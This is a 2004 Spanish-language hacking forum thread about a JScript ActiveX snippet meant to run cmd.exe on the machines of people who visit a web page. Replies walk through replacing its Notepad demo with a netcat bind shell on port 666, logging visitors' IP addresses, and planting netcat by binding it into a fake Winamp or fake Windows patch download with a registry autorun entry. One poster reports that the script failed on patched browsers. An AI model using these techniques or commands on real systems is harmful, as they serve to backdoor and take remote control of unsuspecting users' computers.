elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: 4n4lDetector v1.3: herramienta de análisis estático de malware


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderador: berz3k)
| | |-+  Ejecutar el CMD desde una Web -> Codigo
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Ejecutar el CMD desde una Web -> Codigo  (Leído 7,627 veces)
Virtual-Attack

Desconectado Desconectado

Mensajes: 23


YO :)


Ver Perfil WWW
Ejecutar el CMD desde una Web -> Codigo
« en: 30 Julio 2004, 09:12 »

Bueno aqui les pongo el codigo para ejecutar commandos de
MS-Dos o cualquier otro archivo en la maquina del usuario que entre en la web ....Espero que les sirva. ...


<script language="JScript" DEFER>var obj=new ActiveXObject("Shell.Application");obj.ShellExecute("cmd.exe","/c  Notepad");</script>&nbsp;

[ Virtual-Attack ] :P
En línea

Cada ves que aprendo mas ,me doy cuenta de que puedo seguir aprendiendo :)
© Shadoweps ツ
Wiki

Desconectado Desconectado

Mensajes: 829


Daría todo lo que sé por la mitad de lo que ignoro


Ver Perfil WWW
Re: Ejecutar el CMD desde una Web -> Codigo
« Respuesta #1 en: 30 Julio 2004, 10:04 »

Perdon mi ignorancia pero ese codigo se pega en una web???  y si se pega que utilidad tiene?? como podre abrir el CMD del qe visito la pagina??

esque eso fue lo que entendi que se puede entrar por medio de ese codigo

Salu2
En línea

Todos Se Rien De Mi Por Que Soy Diferente Yo Me Rio De Ustedes Por que Son Todos Iguales -

Rojodos
Colaborador
***
Desconectado Desconectado

Mensajes: 3.537



Ver Perfil WWW
Re: Ejecutar el CMD desde una Web -> Codigo
« Respuesta #2 en: 30 Julio 2004, 10:11 »

No he comprobado si el exploit rula, pero su funcionamiento es simple.

La persona que "visite" la pagina donde este incluido este script, vera como se ejecuta en su PC el notepad (Si usa windows, claro).

Como aprovechar esto?

Bueno, se podria hacer, en vez de ejecutar notepad, que hiciera un "nc -v -L -p 666 -e cmd.exe", dejando una shell de comandos en el puerto 666 (y que podria usarse una y otra vez, ya que he usado el parametro L mayuscula).

Como sabrias la IP de la persona que ha visitado tu web? Muy facil, hay scripts PHP que te lo dicen automaticamente, asi como contadores que proporcionan diversos sitios web (como miarroba.com)

El problema seria como subirle el netcat xD.

Salu2
« Última modificación: 30 Julio 2004, 19:00 por Rojodos » En línea

© Shadoweps ツ
Wiki

Desconectado Desconectado

Mensajes: 829


Daría todo lo que sé por la mitad de lo que ignoro


Ver Perfil WWW
Re: Ejecutar el CMD desde una Web -> Codigo
« Respuesta #3 en: 30 Julio 2004, 10:16 »

Hola Rojodos si ia entendi pero tengo otra duda  :-\

Citar
Bueno, se podria hacer, en vez de ejecutar notepad, que hiciera un "nc -v -L -p 666 -e cmd.exe", dejando una shell de comandos en el puerto 666 (y que podria usarse una y otra vez, ya que he usado el parametro L mayuscula).

que es "nc -v -L -p 666 -e cmd.exe"  ???

Salu2
En línea

Todos Se Rien De Mi Por Que Soy Diferente Yo Me Rio De Ustedes Por que Son Todos Iguales -

Rojodos
Colaborador
***
Desconectado Desconectado

Mensajes: 3.537



Ver Perfil WWW
Re: Ejecutar el CMD desde una Web -> Codigo
« Respuesta #4 en: 30 Julio 2004, 10:25 »

Es el netcat.... si no sabes lo que es, mejor que no jueges con exploits:

nc --> ejecutando el netcat xD

-v --> Verbose (dar bastante informacion). Tambien se puede usar -vv que es doble verbose (doble informacion)

-L --> indica que se ponga en modo escucha recursivo. En lo de recursivo kiere decir, que despues de la primera conexion, seguira activo el netcat (con la opcion -l, solo acepta una conexion y luego deja de escuchar)

- p 666 --> Indica que debe escuchar en el puerto 666 TCP

- e cmd.exe --> Indica que ejecutara cmd.exe, es decir, una shell de comandos de Windows.

En el foro de CURSOS Y DOCUMENTACION, asi como en la sección de Textos y Manuales de la web encontraras info sobre el netcat.

Salu2
En línea

© Shadoweps ツ
Wiki

Desconectado Desconectado

Mensajes: 829


Daría todo lo que sé por la mitad de lo que ignoro


Ver Perfil WWW
Re: Ejecutar el CMD desde una Web -> Codigo
« Respuesta #5 en: 31 Julio 2004, 04:35 »

Hola Rojodos, gracias por la explicacion creo que me boy a dar una vuelta en los subforos qe me dises ia qe me ase falta leer, para poder aprender mas sobre el tema.

Salu2
En línea

Todos Se Rien De Mi Por Que Soy Diferente Yo Me Rio De Ustedes Por que Son Todos Iguales -

Linuxtron

Desconectado Desconectado

Mensajes: 44



Ver Perfil
Re: Ejecutar el CMD desde una Web -> Codigo
« Respuesta #6 en: 4 Agosto 2004, 09:17 »

Citar

Como aprovechar esto?

Bueno, se podria hacer, en vez de ejecutar notepad, que hiciera un "nc -v -L -p 666 -e cmd.exe",

Como sabrias la IP de la persona que ha visitado tu web? Muy facil, hay scripts PHP que te lo dicen automaticamente, asi como contadores que proporcionan diversos sitios web (como miarroba.com)

El problema seria como subirle el netcat xD.

Salu2



Pues yo lo he probado (en un html)  y parece que no rula....no hace nada de nada. (he probado con mozilla y ie6 <-con todos los parches)

X cierto...hablando de nc, q puerto, x excelencia se deja en escucha? es para no tener problemas con el ZoneAlarm Pro ...

Volviendo al tema, ¿alguien lo ha probado? Al menos con el notepad no ha funcionado probare con otro haber...vamos no siquiera abre el cmd y nada.

Y un par de cosas de Rojodos,   como le indicarias mediante la linea la ubicacion?
Para saber la ip de la persona con una vulgar web con phpnuke el administrador puede ver todas las ip (vaya, creo q si) y sobre como subir el nc....facil:
Pones una noticia en la que haya salido un programa nuevo, (o un parche critico para win <<asi lo bajara mas gente>>) ejemplo winamp. Cojes un binder o joiner y le unes el nc, el .reg <para que cada vez q se inicia cargue nc y deje el puerto escuchando> y un .bat indicando las instrucciones propias de nc.

Miras las ip's tal y cual y ya ta. Es una manera un poko "chapucera", pero weno.....

salu2
« Última modificación: 4 Agosto 2004, 09:20 por Linuxtron » En línea

Rojodos
Colaborador
***
Desconectado Desconectado

Mensajes: 3.537



Ver Perfil WWW
Re: Ejecutar el CMD desde una Web -> Codigo
« Respuesta #7 en: 4 Agosto 2004, 19:47 »

No hay puerto especifico a dejar a la escucha en una bindshell.

Los mas comunes son el 666, el 31337 (XD), el 999, el....

Hay de todo. Obviamente estos puertos no se saltan el zone, a no ser que este MUY MAL configurado. No creo que haya ningun puerto que permita a un programa saltarse el Zone, ya que este firewall no mira los puertos que abre o las IPs de destino (aunque se puede configurar de que lo haga), si no que mira los programas.

Si tu en un pc con el Zone puesto, pones a la escucha el netcat, hay casi un 100% de probabilidades de que salte el zone preguntando si deseas darle conexion a internet al programa "nc".

Citar
Y un par de cosas de Rojodos,   como le indicarias mediante la linea la ubicacion?

Esto no lo entiendo... que quieres decir?
En línea

Linuxtron

Desconectado Desconectado

Mensajes: 44



Ver Perfil
Re: Ejecutar el CMD desde una Web -> Codigo
« Respuesta #8 en: 4 Agosto 2004, 23:06 »

OK, thx

Me referia que si pones "nc -v -L -p 666 -e cmd.exe" tendrias q añadir delante la ubicacion, no?

c:\windows\system32\nc -v -L -p 666 -e cmd.exe   ???  Me equivoko? (siempre y cuando este situado ahi)


Tonces es imposible que entre si tiene el zonealarm??? Hombre yo se que muy bien configurado no lo tiene, pero vamos, tonto no es...

Gracias de todos modos.

pd:has conseguido ejecutar al menos el notepad con este "script"?
En línea

Rojodos
Colaborador
***
Desconectado Desconectado

Mensajes: 3.537



Ver Perfil WWW
Re: Ejecutar el CMD desde una Web -> Codigo
« Respuesta #9 en: 4 Agosto 2004, 23:38 »

Joer, pos claro.

Depende donde este el nc en el HD.

Puede estar en cualkier parte, no solo en System32... (si es eso lo que kieres decir...)

Que cosas preguntais algunos xDDDD
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
ejecutar codigo actionscript
Desarrollo Web
soru13 1 1,089 Último mensaje 25 Octubre 2011, 00:54
por Shell Root
Problema al Ejecutar codigo con Geany
Programación General
Ulianov 0 1,184 Último mensaje 25 Enero 2013, 20:35
por Ulianov
Ejecutar un bat desde java y que el codigo no continue
Java
Mine Sweeper 2 4,201 Último mensaje 10 Julio 2013, 19:25
por Mine Sweeper
Ejecutar codigo javascript cuando abra la web desde el movil
Desarrollo Web
Alarkon_88 2 761 Último mensaje 5 Septiembre 2016, 02:07
por Alarkon_88
Ejecutar vbscript código desde un html
Análisis y Diseño de Malware
Borito30 1 976 Último mensaje 14 Febrero 2017, 23:50
por engel lex
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines